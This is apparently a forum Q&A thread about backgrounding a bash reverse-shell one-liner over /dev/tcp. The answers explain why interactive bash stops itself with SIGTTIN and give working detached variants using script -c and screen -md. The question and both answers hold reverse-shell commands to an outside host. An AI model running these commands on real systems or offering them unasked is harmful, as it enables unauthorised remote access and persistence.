# Spawn shell in the background

Tags: bash, ssh

While connected over SSH, I can create a remote shell with this one-liner:

```
bash -i >& /dev/tcp/10.1.1.20/443 0>&1
```

However, this "hangs" my current shell, waiting for the process to finish. So I would like to create a new process. When I try to use the BG operator `&` then the bg process is stopped immediately for some reason:

```
root@debian:~# bash -i >& /dev/tcp/10.1.1.20/443 0>&1 &
[5] 2565
root@debian:~# 

[5]+  Stopped                 bash -i &> /dev/tcp/10.1.1.20/443 0>&1
```

Same happens if I try `bash -c "bash -i..."`

How can I spawn the bash in a new process that doesn't affect my current shell?

Comment: Could you [edit] your question and give us some more details on _why_ you want to do this? On the face of it, starting an interactive shell in the background seems pointless, so I am guessing you want this as the first step towards achieving something else. Maybe if you tell us your final goal, we can give you a better approach to achieve it.

Comment: I don't know about starting something *interactive*, but other than that, `setsid -f bash -c 'some-long-running-command args'  >/dev/null 2>&1 </dev/null` has been my "goto" for this the few times I needed it

Comment: Maybe not for this job, as I get a "bash: cannot set terminal process group (20098): Inappropriate ioctl for device"

Answer (score 2, accepted):

That happens because the interactive shell process checks if it's in the foreground process group on its controlling terminal, and if it's not the case, it kills itself with `SIGTTIN`, a signal which stops it. If its stderr and stdin were redirected elsewhere, it will open `/dev/tty` directly in order to get a fd to its controlling terminal.

This is the code which does that in dash, but bash does the same thing:

```
                do { /* while we are in the background */
                        if ((pgrp = tcgetpgrp(fd)) < 0) {
out:
                                sh_warnx("can't access tty; job control turned off");
                                mflag = on = 0;
                                goto close;
                        }
                        if (pgrp == getpgrp())
                                break;
                        killpg(0, SIGTTIN);
                } while (1);
```

Redirecting a shell's stdandard fds from other files does NOT detach it from the controlling terminal.

The purported "remote shell" trick from the OP is not even remotely reliable or practical; you could have more luck if you wrap it in a command which creates a pseudo-terminal, like `script`:

```
script -c 'bash -i' /dev/null </dev/tcp/somehost/someport >&0 2>&1 &
```

Comment: Interesting to know the reason. If it cannot be made reliably I don't know. Being practical will depend on the application, I suppose

Comment: I think that's the one (script -c)

Answer (score 1):

I can't explain why `bash` refuses to run in the background with the `-i` (interactive) flag when *stdin*, *stdout*, and *stderr* are all redirected. However, to answer the bottom line question, you can start the process through `screen` or `tmux`

```
screen -md bash -c 'bash -i >/dev/tcp/10.1.1.20/443 2>&1 0<&1'
```

The `-m` and `-d` flags tell `screen` to start a new detached process. See `man screen` for details.

Comment: Thanks, I considered them, but neither `screen` or `tmux` are installed in the computer. I tried `nohup` but was not really what I needed